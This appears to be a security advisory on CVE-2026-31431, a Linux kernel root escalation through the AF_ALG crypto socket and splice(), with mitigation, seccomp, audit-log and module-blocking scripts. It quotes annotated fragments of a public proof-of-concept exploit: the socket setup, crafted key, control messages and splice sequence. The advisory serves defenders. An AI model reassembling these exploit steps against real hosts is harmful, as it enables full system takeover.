CVE-2026-31431: Copy Fail Linux Root Privilege Escalation


A newly disclosed Linux flaw nicknamed "Copy Fail" and tracked as **CVE-2026-31431** lets an unprivileged local user escalate to root, and a working exploit is already publicly available. The bug lives in the kernel's `algif_aead` crypto interface and is driven through the `AF_ALG` socket family combined with `splice()` and `sendmsg()`. Because the only prerequisite is the ability to run code on the host, any foothold, whether a compromised container, a web shell, or a hijacked CI job, can be chained into full system takeover. Cloud and Kubernetes operators should patch kernels and rotate node images without waiting for the next maintenance window.

What "Copy Fail" actually is

According to the NVD entry for CVE-2026-31431 and the official CVE record, the issue was resolved in the Linux kernel with a change described as "crypto: algif_aead - Revert to operating out-of-place." In other words, the vulnerable code path performed authenticated-encryption (AEAD) operations in-place when it should have been operating out-of-place, and the fix reverts that behavior. The "Copy Fail" branding lines up with the exploitation primitive: data is shuffled between a file, an anonymous pipe, and a crypto socket using splice(), and the mishandled copy is what an attacker abuses.

Some early write-ups framed the bug as a time-of-check/time-of-use race in a generic memory-copy path. That characterization isn't supported by the upstream advisory, so treat the algif_aead crypto-subsystem description above as the authoritative one.

The flaw is rated high-severity. No precise CVSS figure is published in the material reviewed here, so we are not quoting one. The report attributing the disclosure to Microsoft Security researchers comes from secondary coverage rather than the CVE record, so take that detail as reported rather than confirmed. What is clear and consequential is the impact class: local privilege escalation to root, which needs no network access at all.

Why cloud and Kubernetes hosts are higher risk

On a single-tenant server, local privilege escalation assumes the attacker already has a shell — a real hurdle. In cloud-native stacks that hurdle is much lower, because untrusted code runs on shared kernels routinely:

Multi-tenant Kubernetes: a workload compromised in one namespace can use the exploit to break out to the host node, collapsing isolation and potentially reaching other tenants.
CI/CD runners: build agents pull third-party dependencies constantly. A malicious package that gains execution during a build can chain Copy Fail to root the runner.
Shared-tenancy VMs and managed node pools: anywhere multiple workloads share one host kernel, the blast radius of a single successful exploit grows.
Serverless and edge runtimes: lightweight environments that share a kernel rather than booting full VMs may be affected, depending on the kernel build in use.

The common denominator is the kernel itself: any process — containerized or not — running on a vulnerable kernel and able to execute arbitrary code is a viable launch point.

How the exploit works

A public proof-of-concept is published at github.com/JuanBindez/CVE-2026-31431, with companion write-ups at copy.fail and xint.io. The annotations below are the PoC author's own analysis of what each step does — useful for understanding the technique, but the comments themselves are interpretive (note the question marks in the original), not settled fact.

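The exploit first opens a kernel crypto socket via AF_ALG (address family 38) with socket type 5 (SOCK_SEQPACKET) and binds it to an AEAD transform. The PoC uses terse single-letter names; from usage, `s` appears to be Python's `socket` module: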


a = s.socket(38, 5, 0)  # AF_ALG = 38 (kernel crypto interface)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
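
To see whether a given host or container can reach this interface at all, a defender can attempt the same socket-and-bind step with a harmless algorithm. The following is a minimal sketch and not part of the PoC: the function name `af_alg_aead_status` and the choice of `gcm(aes)` as the probe algorithm are assumptions made for illustration. A successful bind may cause the kernel to autoload `algif_aead`, so run it only where that is acceptable.

```python
import errno
import socket


def af_alg_aead_status(algorithm: str = "gcm(aes)") -> str:
    """Report whether this process can bind an AF_ALG AEAD socket."""
    family = getattr(socket, "AF_ALG", None)  # only defined on Linux builds
    if family is None:
        return "unsupported-platform"
    try:
        sock = socket.socket(family, socket.SOCK_SEQPACKET, 0)
    except OSError as exc:
        # Typically EAFNOSUPPORT (no AF_ALG support) or EPERM/EACCES
        # (filtered by seccomp or an LSM policy).
        return f"socket-blocked ({errno.errorcode.get(exc.errno, exc.errno)})"
    try:
        sock.bind(("aead", algorithm))
    except OSError as exc:
        # Often ENOENT when the AEAD interface or algorithm is unavailable.
        return f"bind-failed ({errno.errorcode.get(exc.errno, exc.errno)})"
    finally:
        sock.close()
    return "reachable"


status = af_alg_aead_status()
print(status)
```

A result other than `reachable` suggests the interface is filtered or unavailable to that process, though it does not by itself prove the kernel is patched.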

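It then sets a crafted key and a second socket option on the AF_ALG socket, and the write-up treats the key bytes as the likely trigger. Assuming `h` is SOL_ALG (279), options 1 and 5 correspond to ALG_SET_KEY and ALG_SET_AEAD_AUTHSIZE in linux/if_alg.h:


v(h, 1, d('0800010000000010'+'0'*64))  # option 1 (ALG_SET_KEY?)
v(h, 5, None, 4)                        # option 5 (ALG_SET_AEAD_AUTHSIZE?), NULL payload, length 4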
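
The key blob is easier to reason about once decoded. The sketch below assumes `d` is `bytes.fromhex` and that the blob follows the kernel's authenc key layout: an rtattr header carrying the encryption-key length, followed by the authentication key and then the encryption key. The helper name `decode_authenc_key` is hypothetical, and little-endian host byte order is assumed.

```python
import struct

# Key blob from the snippet above, assuming d() is bytes.fromhex.
blob = bytes.fromhex("0800010000000010" + "0" * 64)


def decode_authenc_key(key: bytes) -> dict:
    """Split an authenc() key blob into its header fields and key lengths."""
    # struct rtattr { u16 rta_len; u16 rta_type; } in host byte order
    # (little-endian assumed), then a big-endian u32 encryption-key length.
    rta_len, rta_type = struct.unpack_from("<HH", key, 0)
    (enckeylen,) = struct.unpack_from(">I", key, 4)
    payload = key[rta_len:]
    split = len(payload) - enckeylen  # auth key comes first, enc key last
    return {
        "rta_len": rta_len,
        "rta_type": rta_type,
        "enckeylen": enckeylen,
        "auth_key_len": len(payload[:split]),
        "enc_key_len": len(payload[split:]),
        "all_zero_keys": not any(payload),
    }


info = decode_authenc_key(blob)
print(info)
```

Under those assumptions the blob decodes to an 8-byte header (rta_len 8, rta_type 1, enckeylen 16) followed by 16 zero bytes of authentication key and 16 zero bytes of AES key.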

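Next it issues sendmsg() calls carrying three ancillary control messages, a step the write-up characterizes as spraying the kernel heap. In Python's sendmsg() each tuple is (level, type, data), so `h` is the cmsg level and the number after it is the cmsg type. Because `i` is concatenated with bytes literals, it must be a bytes value that pads each payload to a fixed width rather than an integer counter:


u.sendmsg([b"A"*4+c], [
    (h, 3, i*4),           # cmsg type 3 (ALG_SET_OP?)
    (h, 2, b'\x10'+i*19),  # cmsg type 2 (ALG_SET_IV?)
    (h, 4, b'\x08'+i*3)    # cmsg type 4 (ALG_SET_AEAD_ASSOCLEN?)
], 32768)                  # flags: 32768 = MSG_MORE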
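
The three control payloads can be decoded offline to see what they would ask the kernel to do. This is a sketch under stated assumptions: it takes `i` to be a single zero byte (the PoC excerpt does not show its definition), reads each payload's leading 32-bit word as little-endian, and uses the control-message type numbers from linux/if_alg.h. The `describe` helper is hypothetical.

```python
import struct

# Control-message types and operation codes from linux/if_alg.h
ALG_SET_IV, ALG_SET_OP, ALG_SET_AEAD_ASSOCLEN = 2, 3, 4
ALG_OP_NAMES = {0: "ALG_OP_DECRYPT", 1: "ALG_OP_ENCRYPT"}

i = b"\x00"  # ASSUMPTION: the PoC's `i` is a single zero byte

payloads = {
    ALG_SET_OP: i * 4,
    ALG_SET_IV: b"\x10" + i * 19,
    ALG_SET_AEAD_ASSOCLEN: b"\x08" + i * 3,
}


def describe(cmsg_type: int, data: bytes) -> str:
    """Decode the leading little-endian u32 of one control payload."""
    (value,) = struct.unpack_from("<I", data, 0)
    if cmsg_type == ALG_SET_OP:
        return f"operation={ALG_OP_NAMES.get(value, value)}"
    if cmsg_type == ALG_SET_IV:
        # struct af_alg_iv { u32 ivlen; u8 iv[]; }
        return f"ivlen={value}, iv_bytes={len(data) - 4}"
    if cmsg_type == ALG_SET_AEAD_ASSOCLEN:
        return f"assoclen={value}"
    return f"unknown type {cmsg_type}"


decoded = {t: describe(t, data) for t, data in payloads.items()}
for cmsg_type, text in decoded.items():
    print(cmsg_type, text)
```

If the assumption about `i` holds, the messages select a decrypt operation, supply a 16-byte all-zero IV, and declare 8 bytes of associated data.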

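Finally, it moves data from a file through an anonymous pipe and into the crypto socket with splice(), which is where the faulty copy is exercised. Here `g` appears to be Python's `os` module, whose splice() wrapper requires Python 3.10 or later, and `o` is the byte count: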


r, w = g.pipe()           # create anonymous pipe
g.splice(f, w, o, offset_src=0)      # copy from file to pipe
g.splice(r, u.fileno(), o)           # copy from pipe to socket
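
For readers unfamiliar with splice(), the benign sketch below shows only the first hop, file to pipe, and then reads the bytes back out of the pipe instead of sending them to a crypto socket. It is an illustration of the system call's ordinary behavior, not of the vulnerability. The function name `splice_file_through_pipe` is hypothetical, and the helper returns None where `os.splice` is missing or refused.

```python
import os
import tempfile


def splice_file_through_pipe(data: bytes):
    """Move bytes from a temp file into a pipe with os.splice(), then read them."""
    if not hasattr(os, "splice"):  # needs Linux and Python 3.10+
        return None
    with tempfile.TemporaryFile() as src:
        src.write(data)
        src.flush()  # make sure the bytes are visible through the descriptor
        read_end, write_end = os.pipe()
        try:
            # The kernel moves the data from the file into the pipe buffer
            # without copying it through this process's memory.
            moved = os.splice(src.fileno(), write_end, len(data), offset_src=0)
            return os.read(read_end, moved)
        except OSError:
            return None  # e.g. blocked by a sandbox or unsupported filesystem
        finally:
            os.close(read_end)
            os.close(write_end)


result = splice_file_through_pipe(b"copy-test")
print(result)
```

Keep the payload well below the pipe's capacity; a larger transfer would need a loop that drains the pipe between calls.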

A successful run drops the operator into a root shell; the PoC simply confirms it by running id and checking for uid=0.

Exploit status and threat activity

With a reliable privilege-escalation PoC already circulating, the remediation window collapses from weeks to days. Opportunistic ransomware affiliates and more capable APT groups have historically folded public LPE exploits into their tooling within days of release. Treat this as an active threat, not a hypothetical one, especially since the exploit can leave few filesystem artifacts, which makes behavioral detection the more dependable signal.

Detection and mitigation

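Patch first. Updating the kernel to a fixed build is the definitive remedy. A new kernel only takes effect after a reboot (or a vendor live patch), so verify the running version with uname -r afterwards. For distribution packages:


# Ubuntu/Debian
sudo apt update && sudo apt upgrade -y
# RHEL-based systems
sudo yum update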

For Kubernetes, roll node pools onto patched OS images and drain the old nodes. Because the supplied advisories don't enumerate exact vulnerable and fixed kernel version strings, confirm specifics against your distribution's and cloud provider's security bulletins before declaring a host clean.
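
Once your vendor bulletin names a fixed version, the comparison against the running kernel can be scripted. The sketch below is illustrative only: `FIXED_VERSION` is a placeholder and not a real fixed version for this CVE, and the helper names are hypothetical. Distribution kernels often backport fixes without changing the upstream version number, so treat a plain version comparison as a first-pass filter and the vendor's package changelog as the authority.

```python
import platform
import re

# PLACEHOLDER: replace with the fixed version from your vendor's bulletin.
FIXED_VERSION = "0.0.0"


def kernel_tuple(release: str) -> tuple:
    """Extract (major, minor, patch) from a release string such as 6.8.0-45-generic."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_at_least(running: str, fixed: str) -> bool:
    """True when the running release is numerically >= the fixed release."""
    return kernel_tuple(running) >= kernel_tuple(fixed)


if __name__ == "__main__":
    running = platform.release()
    print(running, "meets placeholder threshold:", is_at_least(running, FIXED_VERSION))
```

Running this across a fleet before and after a node-pool rotation gives a quick list of hosts that still need a reboot.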

Temporary workaround: disable the affected module. Where you can't patch immediately, you can block the vulnerable crypto module from loading and unload it if it is already present. Run both commands as root; they only help when algif_aead is built as a loadable module rather than compiled into the kernel:


echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
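
To confirm the workaround took effect, the module list and the modprobe configuration can both be checked. This is a minimal sketch with hypothetical helper names; it parses text in the format of /proc/modules and of modprobe.d files, and it cannot detect a kernel that has the code built in, since built-in code does not appear in /proc/modules.

```python
from pathlib import Path


def module_loaded(proc_modules_text: str, name: str = "algif_aead") -> bool:
    """True if `name` is the first field of any line in /proc/modules text."""
    return any(
        line.split(" ", 1)[0] == name
        for line in proc_modules_text.splitlines()
        if line
    )


def install_rule_present(conf_text: str, name: str = "algif_aead") -> bool:
    """True if an uncommented `install <name> <command>` line is present."""
    for line in conf_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 3 and fields[0] == "install" and fields[1] == name:
            return True
    return False


if __name__ == "__main__":
    proc = Path("/proc/modules")
    if proc.exists():
        print("loaded:", module_loaded(proc.read_text()))
    conf_dir = Path("/etc/modprobe.d")
    if conf_dir.is_dir():
        blocked = any(
            install_rule_present(p.read_text(errors="replace"))
            for p in conf_dir.glob("*.conf")
        )
        print("install rule present:", blocked)
```

The desired state after the workaround is "loaded: False" together with "install rule present: True".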

Additional hardening:

Reduce local execution: aggressively apply least privilege to who and what can run code on sensitive hosts.
Syscall filtering and mandatory access control: seccomp profiles can deny socket() calls that request the AF_ALG family, and AppArmor/SELinux policies can restrict which socket types a workload may create, potentially cutting off the AF_ALG/splice sequence this exploit relies on.
Restrict unprivileged user namespaces where your distribution supports it, to raise the bar for some exploitation paths.
Isolate untrusted workloads in sandboxed runtimes such as gVisor (a user-space kernel) or Kata Containers (lightweight VMs) so they don't share the host kernel directly with sensitive code.
Network segmentation won't stop the LPE itself but shrinks the set of footholds that could deliver initial code execution.
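
As one concrete form of the syscall-filtering item above, the sketch below generates a seccomp profile that rejects socket() when its first argument is AF_ALG (38). It assumes the Docker/OCI-style JSON profile format; the function name `deny_af_alg_profile` is hypothetical. The default-allow stance is for illustration only: in practice you would more likely add the rule to your runtime's existing default profile than replace that profile.

```python
import json

AF_ALG = 38  # address family number of the kernel crypto interface


def deny_af_alg_profile() -> dict:
    """Build a profile that fails socket(AF_ALG, ...) and allows everything else."""
    return {
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {
                "names": ["socket"],
                "action": "SCMP_ACT_ERRNO",
                # Match only when argument 0 (the address family) equals 38.
                "args": [{"index": 0, "value": AF_ALG, "op": "SCMP_CMP_EQ"}],
            }
        ],
    }


profile = deny_af_alg_profile()
print(json.dumps(profile, indent=2))
```

On 32-bit x86, socket creation can also go through the multiplexed socketcall() syscall, which this rule does not cover, so verify the filter on the architectures you actually run.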

Detecting exploitation or post-exploitation:

Kernel audit logging: add auditd rules for unexpected setuid/setgid calls, for processes running with privileges they shouldn't have, and for socket() calls that request the AF_ALG family (38), which few ordinary workloads use.
Runtime security tooling: Falco, Microsoft Defender for Containers, and cloud-native EDR can flag kernel-level anomalies consistent with privilege escalation.
Container-escape indicators: watch for containers touching host namespaces, unexpected nsenter or chroot use, or capabilities outside a workload's security context.
Integrity monitoring: alert on changes to /etc/passwd, /etc/sudoers, or SUID binaries that suggest persistence.
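
If auditd is recording socket() calls (for example via a rule along the lines of `-a always,exit -F arch=b64 -S socket -F a0=38 -k af_alg`, which you should validate against your auditctl version), the resulting records can be filtered for AF_ALG use. The sketch below assumes raw x86_64 audit records, where socket() is syscall 41 and arguments are printed in hexadecimal; the function name and the sample records are made up for illustration.

```python
import re

X86_64_ARCH = "c000003e"      # AUDIT_ARCH_X86_64 as printed in audit records
SOCKET_SYSCALL = "41"         # socket() on x86_64
AF_ALG_HEX = format(38, "x")  # audit prints syscall arguments in hex: "26"

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def af_alg_socket_events(lines):
    """Return (pid, uid, comm) for each SYSCALL record of socket(AF_ALG, ...)."""
    hits = []
    for line in lines:
        if not line.startswith("type=SYSCALL"):
            continue
        fields = {key: value.strip('"') for key, value in FIELD.findall(line)}
        if (fields.get("arch") == X86_64_ARCH
                and fields.get("syscall") == SOCKET_SYSCALL
                and fields.get("a0") == AF_ALG_HEX):
            hits.append((fields.get("pid"), fields.get("uid"), fields.get("comm")))
    return hits


# Fabricated sample records: one AF_ALG socket, one ordinary AF_INET socket.
SAMPLE = [
    'type=SYSCALL msg=audit(1700000000.123:456): arch=c000003e syscall=41 '
    'success=yes exit=3 a0=26 a1=5 a2=0 a3=0 items=0 ppid=100 pid=4242 '
    'auid=1000 uid=1000 gid=1000 comm="python3" exe="/usr/bin/python3" key="af_alg"',
    'type=SYSCALL msg=audit(1700000001.000:457): arch=c000003e syscall=41 '
    'success=yes exit=4 a0=2 a1=1 a2=0 a3=0 items=0 ppid=100 pid=4243 '
    'auid=1000 uid=1000 gid=1000 comm="curl" exe="/usr/bin/curl" key="af_alg"',
]

events = af_alg_socket_events(SAMPLE)
print(events)
```

An AF_ALG socket opened by an unprivileged process that does not normally perform kernel-side crypto is a reasonable trigger for closer inspection, not proof of exploitation.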

Why this deserves priority

A root-level escalation on a shared cloud host is not a contained event: every workload, secret, and credential on that node is exposed, and a compromised Kubernetes node can become a stepping stone toward the control plane if RBAC and network policy aren't tight. A public exploit shortens the safe-to-wait period dramatically, and compliance regimes such as SOC 2, PCI-DSS, and ISO 27001 increasingly expect documented response times for critical kernel bugs with known exploits. Patch the kernels, rotate the node pools, and turn on runtime detection now.

References